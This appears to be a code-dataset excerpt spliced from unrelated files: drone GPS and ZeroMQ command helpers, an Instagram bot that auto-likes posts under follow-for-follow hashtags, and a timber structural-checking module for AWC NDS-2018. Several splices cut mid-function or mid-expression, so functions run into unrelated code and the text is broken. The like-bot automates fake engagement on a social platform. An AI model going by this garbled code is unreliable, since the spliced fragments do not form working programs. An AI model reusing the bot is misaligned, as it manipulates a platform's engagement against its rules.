distance\n except Exception as e:\n log(f\"Error calculating distance between two GPS coordinates: {e}\")\n\n\n#=============================================================================================================\n \ndef new_coords(original_gps_coord, displacement, rotation_degree_relative):\n try:\n vincentyDistance = geopy.distance.distance(meters=displacement)\n original_point = geopy.Point(original_gps_coord[0], original_gps_coord[1])\n new_gps_coord = vincentyDistance.destination(point=original_point, bearing=rotation_degree_relative)\n new_gps_lat = new_gps_coord.latitude\n new_gps_lon = new_gps_coord.longitude\n\n return round(new_gps_lat, 7), round(new_gps_lon, 7)\n except Exception as e:\n log(f\"Error in calculating new coordinates: {e}\")\n\ndef cu_lo(drone):\n try:\n lat = drone.vehicle.location.global_relative_frame.lat\n lon = drone.vehicle.location.global_relative_frame.lon\n heading = drone.vehicle.heading\n return (lat, lon), heading\n except Exception as e:\n log(f\"Error in getting current location: {e}\")\n return (0.0, 0.0), 0.0 # Returning default values in case of an error\n \ndef check_distance(d1,d2):\n try:\n log(\"First drone's current location{}\".format(cu_lo(d1)))\n log(\"Second drone's current location{}\".format(cu_lo(d2)))\n distance = d1.distance_between_two_gps_coord(cu_lo(d1)[0],cu_lo(d2)[0])\n log(\"Distance between those drones is {} meters\".format(distance))\n \n except Exception as e:\n log(f\"Error in check_distance: {e}\")\n\n\n\n#==============================================================================================================\n\nconnected_hosts = set()\nclients = {}\npc = '192.168.207.101'\n\nimport random\n\ndef send(host, immediate_command_str):\n global connected_hosts\n global clients\n\n if host not in connected_hosts:\n context = zmq.Context()\n socket1 = context.socket(zmq.PUSH)\n socket1.connect(f\"tcp://{host}:12345\")\n socket2 = context.socket(zmq.PUSH)\n socket2.connect(f\"tcp://{host}:12345\")\n socket3 = context.socket(zmq.PUSH)\n socket3.connect(f\"tcp://{host}:12345\")\n clients[host] = [socket1,socket2,socket3]\n connected_hosts.add(host)\n immediate_command_str = str(immediate_command_str)\n random_socket = random.choice(clients[host])\n random_socket.send_string(immediate_command_str)\n\n# def camera_stream_server(host):\n# def handle_client(client_socket):\n# connection = client_socket.makefile('wb')\n\n# try:\n# with picamera.PiCamera() as camera:\n# camera.resolution = (640, 480) # Adjust resolution as 
needed\n# camera.framerate = 30 # Adjust frame rate as needed\n\n# # Start capturing and sending the video feed\n# time.sleep(2) # Give the camera some time to warm up\n# stream = io.BytesIO()\n# for _ in camera.capture_continuous(stream, 'jpeg', use_video_port=True):\n# stream.seek(0)\n# image_data = stream.read()\n\n# # Send the image size to the client\n# connection.write(struct.pack('<L', len(image_data)))\n\n if image_count >= 4:\n break\n\n picture.click()\n sleep(sleepy_time)\n\n heart = driver.find_element_by_css_selector('svg[aria-label=\"Like\"]')\n heart.click()\n print('> Image liked')\n sleep(3)\n\n close_pic = driver.find_element_by_css_selector('[aria-label=\"Close\"]')\n close_pic.click()\n sleep(3)\n\n image_count += 1\n #print(image_count, \"images liked\")\n sleep(sleepy_time)\n\ndef main():\n driver = webdriver.Chrome('/Users/user/PycharmProjects/igbot1/chromedriver')\n login(driver)\n\n tags = [\n 'f4f',\n 'l4l',\n 'lifestyle',\n 'happy'\n ]\n\n for tag in tags:\n open_tag(driver, f\"https://www.instagram.com/explore/tags/{tag}\")\n print('Done with', tag)\n\nmain()\n\nfile_tracker = open('igbot_tracker.txt', '+a')\nfhand = file_tracker\n\nlinecount = 0\n\nfhand.write('\\nRun')\n\nfhand.seek(0)\nfor lines in fhand:\n linecount += 1\n\nprint(linecount)","repo_name":"blockchainaddict/IGBot","sub_path":"botX_chrm.py","file_name":"botX_chrm.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25811295715","text":"# -*- coding: utf-8 -*-\n''' Classes and functions for limit state checking according to the\n National Design Specification of the American Wood Council.'''\n\nfrom __future__ import print_function\nfrom __future__ import division\n\n__author__= \"Ana Ortega (AO_O) Luis C. Pérez Tato (LCPT)\"\n__copyright__= \"Copyright 2022 LCPT\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"ana.ortega@ciccp.es, l.pereztato@gmail.com\"\n\nimport sys\nimport math\nimport geom\nimport xc\nfrom misc_utils import log_messages as lmsg\nfrom materials import member_base\nfrom materials import wood_member_base\nfrom materials import limit_state_checking_base as lsc\nfrom materials.awc_nds import AWCNDS_materials\nfrom postprocess import control_vars as cv\nfrom misc_utils import units_utils\nfrom model import predefined_spaces\nfrom actions import load_cases as lcm\nfrom solution import predefined_solutions\n\nclass Member(wood_member_base.Member):\n ''' Beam and column members according to AWC NDS-2018. 
This class\n exists to compute and update the values of the buckling reduction\n factors of the members (chiN, chiLT, FcE and FbE).\n\n :ivar unbracedLengthX: unbraced length for torsional buckling \n about the longitudinal axis.\n :ivar unbracedLengthY: unbraced length for flexural buckling \n about y-axis.\n :ivar unbracedLengthZ: unbraced length for flexural buckling \n about z-axis.\n :ivar Cr: repetitive member factor.\n :ivar connection: connection type at member ends.\n :ivar memberRestraint: Member restraint condition according to clause 4.4.1.2 of AWC_NDS2018.\n :ivar memberLoadingCondition: parameters defining the member condition in order to obtain \n its effective length according to table 3.3.3 of AWC NDS-2018.\n :ivar loadCombDurationFactorFunction: function that returns the load \n duration factor corresponding to\n a load combination expression\n (e.g.: 1.0*deadLoad+0.7*windLoad).\n '''\n def __init__(self, name, section, unbracedLengthX, unbracedLengthY= None, unbracedLengthZ= None, Cr= 1.0, connection= member_base.MemberConnection(), memberRestraint= AWCNDS_materials.MemberRestraint.notApplicable, memberLoadingCondition= AWCNDS_materials.MemberLoadingCondition(), loadCombDurationFactorFunction= None, lstLines=None):\n ''' Constructor. \n\n :param name: object name.\n :param section: timber cross-section.\n :param Cr: repetitive member factor.\n :param unbracedLengthX: unbraced length for torsional buckling \n about the longitudinal axis.\n :param unbracedLengthY: unbraced length for flexural buckling \n about y-axis.\n :param unbracedLengthZ: unbraced length for flexural buckling \n about z-axis.\n :param connection: connection type at member ends.\n :param memberRestraint: Member restraint condition according to clause 4.4.1.2 of AWC_NDS2018.\n :param memberLoadingCondition: parameters defining the member condition in order to obtain \n its effective length according to table 3.3.3 of AWC NDS-2018.\n :param loadCombDurationFactorFunction: function that returns the load \n duration factor corresponding to\n a load combination expression\n (e.g.: 1.0*deadLoad+0.7*windLoad).\n :param lstLines: ordered list of lines that make up the beam.\n '''\n super(Member,self).__init__(name, section, lstLines)\n self.unbracedLengthX= unbracedLengthX\n if(unbracedLengthY):\n self.unbracedLengthY= unbracedLengthY\n else:\n self.unbracedLengthY= unbracedLengthX\n if(unbracedLengthZ):\n self.unbracedLengthZ= unbracedLengthZ\n else:\n self.unbracedLengthZ= unbracedLengthX\n self.crossSection.Cr= Cr\n self.connection= connection\n self.memberRestraint= memberRestraint\n self.memberLoadingCondition= memberLoadingCondition\n self.loadCombDurationFactorFunction= loadCombDurationFactorFunction\n \n def getFcAdj(self):\n ''' Return the adjusted value of Fc including the column stability\n factor.'''\n sectionFcAdj= self.crossSection.getFcAdj()\n CP= self.getColumnStabilityFactor()\n return CP*sectionFcAdj\n \n def getFbAdj(self, majorAxis= True):\n ''' Return the adjusted value of Fb including the beam stability factor.\n\n :param majorAxis: if true return adjusted Fb for bending around major axis.\n '''\n sectionFbAdj= self.crossSection.getFbAdj(majorAxis= majorAxis)\n CL= self.getBeamStabilityFactor()\n return CL*sectionFbAdj\n \n def getFtAdj(self):\n ''' Return the adjusted value of Ft.'''\n return self.crossSection.getFtAdj() \n \n def getEffectiveBucklingLengthCoefficientRecommended(self):\n '''Return the column effective buckling length coefficients\n according to NDS 2018 appendix G'''\n 
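# NDS 2018 Appendix G tabulates the recommended buckling length coefficients\n # Ke by end condition (roughly 0.65 for fixed-fixed up to 2.4 for the\n # sway-permitted fixed-free case); the lookup is delegated to the connection object.\n 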
return self.connection.getEffectiveBucklingLengthCoefficientRecommended()\n \n def getColumnSlendernessRatioB(self):\n ''' Return the slenderness ratio of the member working as\n column for bending in the B plane.'''\n Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n return Ke*self.unbracedLengthY/self.crossSection.b\n \n def getColumnSlendernessRatioH(self):\n ''' Return the slenderness ratio of the member working as\n column for bending in the H plane.'''\n Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n return Ke*self.unbracedLengthZ/self.crossSection.h\n\n def getColumnSlendernessRatioBH(self):\n ''' Return both the slenderness ratios of the member working as\n column.'''\n Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n srB= Ke*self.unbracedLengthY/self.crossSection.b\n srH= Ke*self.unbracedLengthZ/self.crossSection.h\n return (srB,srH)\n \n \n def getColumnSlendernessRatio(self):\n ''' Return the slenderness ratio of the member working as\n column.'''\n (srB, srH)= self.getColumnSlendernessRatioBH()\n return max(srB,srH)\n\n def getColumnStabilityFactor(self):\n ''' Return the column stability factor according\n to expressions 3.7-1 and 15.2-1 of NDS-2018. \n '''\n (srB, srH)= self.getColumnSlendernessRatioBH()\n sr= max(srB,srH)\n E_adj= self.crossSection.getEminAdj()\n FcE= 0.822*E_adj/((sr)**2)\n Fc_adj= self.crossSection.getFcAdj()\n ratio= FcE/Fc_adj\n c= self.crossSection.wood.get37_1c()\n tmp= (1+ratio)/2.0/c\n retval= tmp-math.sqrt(tmp**2-ratio/c)\n if(self.crossSection.isBuiltUpSection()): # built-up section (clause 15.2).\n if(srB>srH): # weak-axis slenderness ratio governs.\n retval*= 0.6 # Equation 15.2-1\n return retval\n \n def getFcE1(self):\n ''' Return the critical buckling design value for compression\n members (F_{cE1}) as defined in section 3.9.2 of NDS-2018\n for buckling about the major axis.\n '''\n E_adj= self.crossSection.getEminAdj()\n if(self.crossSection.h>self.crossSection.b): # Wide side: H\n return 0.822*E_adj/(self.getColumnSlendernessRatioH())**2\n else: # Wide side B\n return 0.822*E_adj/(self.getColumnSlendernessRatioB())**2\n \n def getFcE2(self):\n ''' Return the critical buckling design value for compression\n members (F_{cE2}) as defined in section 3.9.2 of NDS-2018\n for buckling about the minor axis.\n '''\n E_adj= self.crossSection.getEminAdj()\n if(self.crossSection.h>self.crossSection.b): # Wide side: H\n return 0.822*E_adj/(self.getColumnSlendernessRatioB())**2\n else: # Wide side B\n return 0.822*E_adj/(self.getColumnSlendernessRatioH())**2\n \n def getFcE(self):\n ''' Return both critical buckling design values for compression\n members as defined in section 3.9.2 of NDS-2018, ordered as\n (major axis, minor axis).\n '''\n E_adj= self.crossSection.getEminAdj()\n EH= 0.822*E_adj/(self.getColumnSlendernessRatioH())**2\n EB= 0.822*E_adj/(self.getColumnSlendernessRatioB())**2\n if(self.crossSection.h>self.crossSection.b): # Wide side: H\n return (EH, EB)\n else: # Wide side B\n return (EB, EH)\n \n def getConcentratedLoadsBucklingLength(self, unbracedLength):\n ''' Return the effective length coefficient of the member according to table\n 3.3.3 of NDS-2018.\n\n :param unbracedLength: unbraced length for the bending axis.\n '''\n return self.memberLoadingCondition.getEffectiveLength(unbracedLength= unbracedLength, section= self.crossSection)\n\n def getBeamStabilityFactor(self, majorAxis= True):\n ''' Return the beam stability factor according to clauses 3.3.3 \n and 4.4.1.2 of AWC NDS-2018.\n\n :param majorAxis: if true return adjusted Fb for bending around major axis.\n '''\n if(majorAxis):\n ## Check if\n if(self.memberRestraint>self.crossSection.getRequiredRestraint()):\n retval= 1.0\n else: ## Equation 3.3-6\n FbE= self.getFbECriticalBucklingDesignValue()\n FbAdj= self.crossSection.getFbAdj(majorAxis= majorAxis)\n ratio= FbE/FbAdj\n A= (1+ratio)/1.9\n B= A**2\n C= ratio/0.95\n retval= A-math.sqrt(B-C)\n else:\n retval= 1.0\n return retval\n \n
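 # Worked example for Equation 3.3-6 (illustrative numbers): with FbE/FbAdj = 1.2,\n # A = 2.2/1.9 = 1.158, and CL = 1.158 - sqrt(1.158**2 - 1.2/0.95) = 0.88 (approx.).\n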
design value for bending according to \n    #         section 3.3.3.8 of NDS-2018.\n    #     '''\n    #     RB= self.getBendingSlendernessRatio()\n    #     return 1.2*self.crossSection.wood.Emin/RB**2\n    \n    def getColumnEffectiveLength(self):\n        ''' Return the effective length of the member working \n            as column in the H and B planes.'''\n        Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n        return (Ke*self.unbracedLengthZ, Ke*self.unbracedLengthY)\n    \n    def getColumnBendingSlendernessRatioH(self):\n        ''' Return the slenderness ratio of the member working as\n            column for bending in the H plane.'''\n        Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n        le= Ke*self.unbracedLengthZ\n        return math.sqrt(le*self.crossSection.h/self.crossSection.b**2)\n    \n    def getColumnBendingSlendernessRatioB(self):\n        ''' Return the slenderness ratio of the member working as\n            column for bending in the B plane.'''\n        Ke= self.getEffectiveBucklingLengthCoefficientRecommended()\n        le= Ke*self.unbracedLengthY\n        return math.sqrt(le*self.crossSection.b/self.crossSection.h**2)\n\n    def getColumnBendingSlendernessRatioHB(self):\n        ''' Return the slenderness ratio of the member working as\n            column for bending in the H and B planes.'''\n        leH, leB= self.getColumnEffectiveLength()\n        return (math.sqrt(leH*self.crossSection.h/self.crossSection.b**2), math.sqrt(leB*self.crossSection.b/self.crossSection.h**2))\n    \n    def getColumnBendingSlendernessRatio(self):\n        ''' Return the maximum slenderness ratio for bending between the\n            H and B planes.'''\n        srH, srB= self.getColumnBendingSlendernessRatioHB()\n        return max(srH, srB)\n    \n    def getBeamEffectiveLength(self):\n        ''' Return the effective length of the member working as beam \n            according to table 3.3.3 of NDS-2018.\n        '''\n        return (self.getConcentratedLoadsBucklingLength(self.unbracedLengthZ), self.getConcentratedLoadsBucklingLength(self.unbracedLengthY))\n    \n    def getBeamBendingSlendernessRatioHB(self):\n        ''' Return the slenderness ratio according to equation\n            3.3-5 of NDS-2018.\n        '''\n        (leH, leB)= self.getBeamEffectiveLength()\n        return (math.sqrt(leH*self.crossSection.h/self.crossSection.b**2), math.sqrt(leB*self.crossSection.b/self.crossSection.h**2))\n    \n    def getFbECriticalBucklingDesignValueHB(self):\n        ''' Return the critical buckling design value for bending according to \n            section 3.3.3.8 of NDS-2018.\n        '''\n        sr= self.getBeamBendingSlendernessRatioHB()\n        E_adj= self.crossSection.getEminAdj()\n        return (1.2*E_adj/sr[0]**2, 1.2*E_adj/sr[1]**2)\n    \n    def getFbECriticalBucklingDesignValue(self):\n        ''' Return the critical buckling design value for bending (F_{bE}) \n            as defined in section 3.9.2 of NDS-2018.\n        '''\n        tmp= self.getFbECriticalBucklingDesignValueHB()\n        return min(tmp[0], tmp[1])\n\n    def getBiaxialBendingEfficiency(self, Nd, Myd, Mzd, Vyd= 0.0, chiN=1.0, chiLT= 1.0):\n        '''Return biaxial bending efficiency according to clause 3.9 of AWC-NDS2018.\n\n        :param Nd: required axial strength.\n        :param Myd: required bending strength (minor axis).\n        :param Mzd: required bending strength (major axis).\n        :param Vyd: required shear strength (major axis)\n        :param chiN: column stability factor clause 3.7.1 of AWC-NDS2018 (default= 1.0).\n        :param chiLT: beam stability factor clause 3.3.3 of AWC-NDS2018 (default= 1.0).\n        '''\n        # Critical buckling design values for compression.\n        FcE= self.getFcE()\n        FbE= self.getFbECriticalBucklingDesignValue()\n        return self.crossSection.getBiaxialBendingEfficiency(Nd= Nd, Myd= Myd, Mzd= Mzd, FcE= FcE, FbE= FbE, chiN= chiN, chiLT= chiLT)\n\n    def updateLoadDurationFactor(self, 
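For reference, the relations implemented just above reduce to R_B = sqrt(l_e*d/b^2) (NDS-2018 eq. 3.3-5) and F_bE = 1.2*E_min'/R_B^2 (clause 3.3.3.8). A self-contained numeric sketch of the two formulas, with made-up member data rather than values from this module:

import math

def beamSlendernessRatio(le, d, b):
    # NDS-2018 equation 3.3-5: R_B = sqrt(l_e*d/b^2)
    return math.sqrt(le*d/b**2)

def criticalFbE(Emin_adj, RB):
    # Critical buckling design value for bending (NDS-2018 clause 3.3.3.8).
    return 1.2*Emin_adj/RB**2

# Illustrative dimensions in meters and an assumed adjusted Emin in Pa.
RB= beamSlendernessRatio(le= 4.0, d= 0.235, b= 0.089)
print(criticalFbE(Emin_adj= 4.0e9, RB= RB))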
loadCombExpr):\n '''Update the value of the load duration factors.'''\n if(self.loadCombDurationFactorFunction):\n CD= self.loadCombDurationFactorFunction(loadCombExpr)\n self.crossSection.updateLoadDurationFactor(CD)\n \n def updateReductionFactors(self):\n '''Update the value of the appropriate reduction factors.'''\n chiN= self.getColumnStabilityFactor()\n chiLT= self.getBeamStabilityFactor()\n FcE= self.getFcE()\n FbE= self.getFbECriticalBucklingDesignValue()\n for e in self.elemSet:\n e.setProp('chiLT',chiLT) # flexural strength reduction factor.\n e.setProp('chiN',chiN) # compressive strength reduction factor.\n e.setProp('FcE', FcE) # critical buckling design values for compression members (both axis).\n e.setProp('FbE', FbE) # critical buckling design value for bending members.\n \n def installULSControlRecorder(self, recorderType, chiN: float= 1.0, chiLT: float= 1.0, FcE= (0.0,0.0), FbE= 0.0, calcSet= None):\n '''Install recorder for verification of ULS criterion.\n\n :param recorderType: type of the recorder to install.\n :param chiN: compressive strength reduction factor.\n :param chiLT: flexural strength reduction factor.\n :param FcE: critical buckling design values for compression members (both axis).\n :param FbE: critical buckling design value for bending members.\n :param calcSet: set of elements to be checked (defaults to 'None' which \n means that this set will be created elsewhere). In not\n 'None' the member elements will be appended to this set.\n '''\n recorder= self.createRecorder(recorderType, calcSet)\n self.crossSection.setupULSControlVars(self.elemSet, chiN= chiN, chiLT= chiLT, FcE= FcE, FbE= FbE)\n nodHndlr= self.getPreprocessor().getNodeHandler \n if(nodHndlr.numDOFs==3):\n recorder.callbackRecord= controlULSCriterion2D()\n else:\n recorder.callbackRecord= controlULSCriterion()\n# recorder.callbackRestart= \"print(\\\"Restart method called.\\\")\" #20181121\n return recorder\n\ndef controlULSCriterion():\n return '''recorder= self.getProp('ULSControlRecorder')\nnmbComb= recorder.getCurrentCombinationName\ncrossSection= self.getProp('crossSection')\ncrossSection.checkBiaxialBendingForElement(self,nmbComb)\ncrossSection.checkYShearForElement(self,nmbComb)\ncrossSection.checkZShearForElement(self,nmbComb)'''\n\ndef controlULSCriterion2D():\n return '''recorder= self.getProp('ULSControlRecorder')\nnmbComb= recorder.getCurrentCombinationName\ncrossSection= self.getProp('crossSection')\ncrossSection.checkUniaxialBendingForElement(self,nmbComb)\ncrossSection.checkYShearForElement(self,nmbComb)'''\n\nclass BeamMember(Member):\n ''' Beam member according to chapter 3.3 of NDS-2018.\n\n '''\n def __init__(self, unbracedLength, section, connection= member_base.MemberConnection(), Cr= 1.0, memberRestraint= AWCNDS_materials.MemberRestraint.notApplicable, memberLoadingCondition= AWCNDS_materials.MemberLoadingCondition()):\n ''' Constructor. 
\n\n        :param unbracedLength: unbraced length for torsional buckling \n                               about the longitudinal axis.\n        :param section: timber cross-section.\n        :param connection: connection type at beam ends.\n        :param Cr: repetitive member factor.\n        :param memberLoadingCondition: parameters defining the member condition in order to obtain \n                                       its effective length according to table 3.3.3 of AWC NDS-2018.\n        '''\n        super(BeamMember,self).__init__(name= None, unbracedLengthX= unbracedLength, section= section, Cr= Cr, connection= connection, memberRestraint= memberRestraint, memberLoadingCondition= memberLoadingCondition) \n    \n    def getEffectiveLength(self):\n        ''' Return the effective length of the beam according to table\n            3.3.3 of NDS-2018.\n        '''\n        return self.getConcentratedLoadsBucklingLength(self.unbracedLengthX)\n    \n    def getBendingSlendernessRatio(self):\n        ''' Return the slenderness ratio according to equation\n            3.3-5 of NDS-2018.\n        '''\n        le= self.getEffectiveLength()\n        return math.sqrt(le*self.crossSection.h/self.crossSection.b**2)\n    \n    def getBiaxialBendingEfficiency(self, Nd, Myd, Mzd, Vyd= 0.0, chiN=1.0, chiLT= 1.0):\n        '''Return biaxial bending efficiency according to clause 3.9 of AWC-NDS2018.\n\n        :param Nd: required axial strength.\n        :param Myd: required bending strength (minor axis).\n        :param Mzd: required bending strength (major axis).\n        :param Vyd: required shear strength (major axis)\n        :param chiN: column stability factor clause 3.7.1 of AWC-NDS2018 (default= 1.0).\n        :param chiLT: beam stability factor clause 3.3.3 of AWC-NDS2018 (default= 1.0).\n        '''\n        # Critical buckling design values for compression.\n        return self.crossSection.getBiaxialBendingEfficiency(Nd= Nd, Myd= Myd, Mzd= Mzd, chiN= chiN, chiLT= chiLT)\n\nclass ColumnMember(Member):\n    ''' Column member according to chapter 3.7 and 3.9 of NDS-2018.\n\n    :ivar unbracedLengthB: unbraced length for bending about the weak axis.\n    '''\n    def __init__(self, unbracedLengthB, unbracedLengthH, section, repetitiveMemberFactor= 1.0, connection= member_base.MemberConnection(), memberRestraint= AWCNDS_materials.MemberRestraint.notApplicable, memberLoadingCondition= AWCNDS_materials.MemberLoadingCondition(), loadCombDurationFactorFunction= None):\n        ''' Constructor. 
\n\n :param unbracedLengthB: unbraced lenght for bending about weak axis (BworstCaseCF):\n worstCaseCF= CF\n worstCase= loadCombName\n return results, worstCase\n \nclass WallTopPlates(object):\n '''Plates on the top of a bearing wall.\n\n :ivar prb: XC finite element problem.\n :ivar plateSection: plate section.\n :ivar nodes: node handler.\n :ivar modelSpace: structural mechanics two-dimensional model of the plates.\n :ivar studSpacing: spacing of the studs that support the plates.\n :ivar trussSpacing: spacing of the trusses supported by the plates.\n :ivar pointLoadFactor: ??\n :ivar loadCombDurationFactorFunction: function that returns the load \n duration factor corresponding to\n a load combination expression\n (e.g.: 1.0*deadLoad+0.7*windLoad).\n '''\n def __init__(self, title, plateSection, studSpacing, trussSpacing, pointLoadFactor, loadCombDurationFactorFunction= None):\n '''Constructor.\n\n :param title: problem title.\n :param plateSection: plate section.\n :param nodes: node handler.\n :param modelSpace: structural mechanics two-dimensional model of the plates.\n :param studSpacing: spacing of the studs that support the plates.\n :param trussSpacing: spacing of the trusses supported by the plates.\n :param pointLoadFactor: ??\n :param loadCombDurationFactorFunction: function that returns the load \n duration factor corresponding to\n a load combination expression\n (e.g.: 1.0*deadLoad+0.7*windLoad).\n '''\n self.prb= xc.FEProblem()\n self.prb.title= title\n self.plateSection = plateSection\n preprocessor= self.prb.getPreprocessor \n self.nodes= preprocessor.getNodeHandler\n self.modelSpace= predefined_spaces.StructuralMechanics2D(self.nodes)\n self.studSpacing= studSpacing\n self.trussSpacing= trussSpacing\n self.pointLoadFactor= pointLoadFactor\n self.loadCombDurationFactorFunction= loadCombDurationFactorFunction\n \n def genMesh(self):\n ''' Create the finite element mesh.'''\n prep= self.modelSpace.preprocessor\n pointHandler= prep.getMultiBlockTopology.getPoints\n infPoints= list()\n supPoints= list()\n for i in range(0,14):\n x= i*self.studSpacing\n infPoints.append(pointHandler.newPoint(geom.Pos3d(x,0.0,0.0)))\n supPoints.append(pointHandler.newPoint(geom.Pos3d(x,self.plateSection.h,0.0)))\n\n lines= prep.getMultiBlockTopology.getLines\n self.infSet= prep.getSets.defSet(\"inf\")\n infLines= list()\n p0= infPoints[0]\n for p in infPoints[1:]:\n l= lines.newLine(p0.tag,p.tag)\n infLines.append(l)\n self.infSet.getLines.append(l)\n p0= p\n self.supSet= prep.getSets.defSet(\"sup\")\n supLines= list()\n p0= supPoints[0]\n for p in supPoints[1:]:\n l= lines.newLine(p0.tag,p.tag)\n supLines.append(l)\n self.supSet.getLines.append(l)\n p0= p\n self.infSet.fillDownwards()\n self.supSet.fillDownwards()\n\n # Mesh\n section= self.plateSection.defElasticShearSection2d(prep)\n trfs= prep.getTransfCooHandler\n lin= trfs.newLinearCrdTransf2d(\"lin\")\n seedElemHandler= prep.getElementHandler.seedElemHandler\n seedElemHandler.defaultMaterial= section.name\n seedElemHandler.defaultTransformation= lin.name\n elem= seedElemHandler.newElement(\"ElasticBeam2d\",xc.ID([0,0]))\n if __debug__:\n if(not elem):\n AssertionError('Can\\'t create the element.')\n infSetMesh= self.infSet.genMesh(xc.meshDir.I)\n if __debug__:\n if(not infSetMesh):\n AssertionError('Can\\'t create the mesh.')\n self.infSet.fillDownwards()\n supSetMesh= self.supSet.genMesh(xc.meshDir.I)\n if __debug__:\n if(not supSetMesh):\n AssertionError('Can\\'t create the mesh.')\n self.supSet.fillDownwards()\n\n ## Loaded 
nodes.\n self.loadedNodes= list()\n pos= supPoints[0].getPos+geom.Vector3d(self.studSpacing/2.0,0,0) #Position of the first loaded node\n xLast= supPoints[-1].getPos.x\n while(pos.xworstDeflectionValue):\n worstDeflectionValue= deflectionValue\n worstDeflectionCase= lcName\n \n bendingCF= results[lcName]['bendingCF']\n if(bendingCF>worstBendingCF):\n worstBendingCF= bendingCF\n worstBendingCase= lcName\n \n shearCF= results[lcName]['shearCF']\n if(shearCF>worstShearCF):\n worstShearCF= shearCF\n worstShearCase= lcName\n \n perpComprCF= results[lcName]['Fc_perpCF']\n if(perpComprCF>worstPerpComprCF):\n worstPerpComprCF= perpComprCF\n worstPerpComprCase= lcName\n # Store the values in a dictionary.\n worstResults= {'worstDeflectionCase':worstDeflectionCase, 'worstDeflectionValue':worstDeflectionValue, 'worstBendingCase':worstBendingCase, 'worstBendingCF':worstBendingCF, 'worstShearCase':worstShearCase, 'worstShearCF':worstShearCF, 'worstPerpComprCase':worstPerpComprCase, 'worstPerpComprCF':worstPerpComprCF}\n return results, worstResults\n\n def check(self, loadDict, combContainer):\n ''' Check the plates for the load arguments.\n\n :param loadDict: dictionary containing the load values.\n :param combContainer: load combinations.\n '''\n # Create model\n self.genMesh()\n # Define loads.\n self.defineLoads(loadDict)\n # Define load combinations.\n combContainer.dumpCombinations(self.modelSpace.preprocessor)\n # Checking\n return self.checkCombinations(combContainer.SLS.qp)\n \nclass AWCNDSBiaxialBendingControlVars(cv.BiaxialBendingStrengthControlVars):\n '''Control variables for biaxial bending normal stresses LS \n verification in steel-shape elements according to AISC.\n\n :ivar FcE: critical buckling design value for compression members (both axis).\n '''\n def __init__(self,idSection= 'nil',combName= 'nil',CF= -1.0,N= 0.0,My= 0.0,Mz= 0.0,Ncrd=0.0,McRdy=0.0,McRdz=0.0, FcE= (0.0,0.0), FbE= 0.0, chiLT=1.0, chiN= 1.0):\n '''\n Constructor.\n\n :param idSection: section identifier\n :param combName: name of the load combinations to deal with\n :param CF: capacity factor (efficiency) (defaults to -1)\n :param N: axial force (defaults to 0.0)\n :param My: bending moment about Y axis (defaults to 0.0)\n :param Mz: bending moment about Z axis (defaults to 0.0)\n :param Ncrd: design strength to axial compression\n :param McRdy: design moment strength about Y (weak) axis\n :param McRdz: design moment strength about Z (strong) axis\n :param FcE: critical buckling design value for compression members (both axis).\n :param FbE: critical bucking design value for bending according to \n section 3.3.3.8 of NDS-2018.\n :param chiLT: reduction factor for lateral-torsional buckling (defaults to 1)\n :param chiN: reduction factor for compressive strength (defaults to 1)\n '''\n super(AWCNDSBiaxialBendingControlVars,self).__init__(idSection,combName,CF,N,My,Mz,Ncrd=Ncrd,McRdy=McRdy,McRdz=McRdz, chiLT=chiLT, chiN= chiN)\n self.FcE= FcE\n self.FbE= FbE\n \n def getDict(self):\n ''' Return a dictionary containing the object data.'''\n retval= super(AWCNDSBiaxialBendingControlVars,self).getDict()\n retval.update({'FcE':self.FcE, 'FbE':self.FbE})\n return retval\n \n def setFromDict(self,dct):\n ''' Set the data values from the dictionary argument.'''\n super(AWCNDSBiaxialBendingControlVars,self).setFromDict(dct)\n self.FcE= dct['FcE']\n self.FbE= dct['FbE']\n\nclass BiaxialBendingNormalStressController(lsc.LimitStateControllerBase2Sections):\n '''Object that controls normal stresses limit state.'''\n\n 
ControlVars= AWCNDSBiaxialBendingControlVars\n def __init__(self, limitStateLabel):\n ''' Constructor.\n\n :param limitStateLabel: label that identifies the limit state.\n '''\n super(BiaxialBendingNormalStressController,self).__init__(limitStateLabel)\n\n def updateEfficiency(self, elem, elementInternalForces):\n ''' Compute the efficiency of the material of the element\n subjected to the internal forces argument and update\n its value if its bigger than the previous one.\n\n :param elem: finite element whose material will be checked.\n :param elementInternalForces: internal forces acting on the cross-section.\n '''\n # Get section properties.\n crossSection= elem.getProp('crossSection')\n if(not crossSection):\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.warning(className+'.'+methodName+'; undefined \"crossSection\" property for element: '+str(elem.tag)+'; nothing done.')\n else:\n # Check each element section.\n for lf in elementInternalForces:\n # Compute efficiency.\n CFtmp= crossSection.getBiaxialBendingEfficiency(Nd= lf.N, Myd= lf.My, Mzd= lf.Mz, FcE= lf.FcE, FbE= lf.FbE, chiN= lf.chiN, chiLT= lf.chiLT)[0]\n sectionLabel= self.getSectionLabel(lf.idSection)\n label= self.limitStateLabel+sectionLabel\n # Update efficiency.\n if(CFtmp>elem.getProp(label).CF):\n elem.setProp(label,self.ControlVars(idSection= sectionLabel, combName= lf.idComb, CF= CFtmp, N= lf.N, My= lf.My, Mz= lf.Mz, FcE= lf.FcE, FbE= lf.FbE, chiN= lf.chiN, chiLT= lf.chiLT))\n \nclass ShearController(lsc.LimitStateControllerBase2Sections):\n '''Object that controls shear limit state.'''\n\n ControlVars= cv.ShearYControlVars\n def __init__(self,limitStateLabel):\n ''' Constructor.\n\n :param limitStateLabel: label that identifies the limit state.\n '''\n super(ShearController,self).__init__(limitStateLabel)\n\n def updateEfficiency(self, elem, elementInternalForces):\n ''' Compute the efficiency of the element steel shape\n subjected to the internal forces argument and update\n its value if its bigger than the previous one.\n\n :param elem: finite element whose section will be checked.\n :param elementInternalForces: internal forces acting on the steel shape.\n '''\n # Get section properties.\n crossSection= elem.getProp('crossSection')\n if(not crossSection):\n className= type(self).__name__\n methodName= sys._getframe(0).f_code.co_name\n lmsg.warning(className+'.'+methodName+'; undefined \"crossSection\" property for element: '+str(elem.tag)+'; nothing done.')\n else:\n # Check each element section.\n for sectionIForces in elementInternalForces:\n # Compute efficiency.\n CFtmp= crossSection.getYShearEfficiency(sectionIForces.Vy)\n sectionLabel= 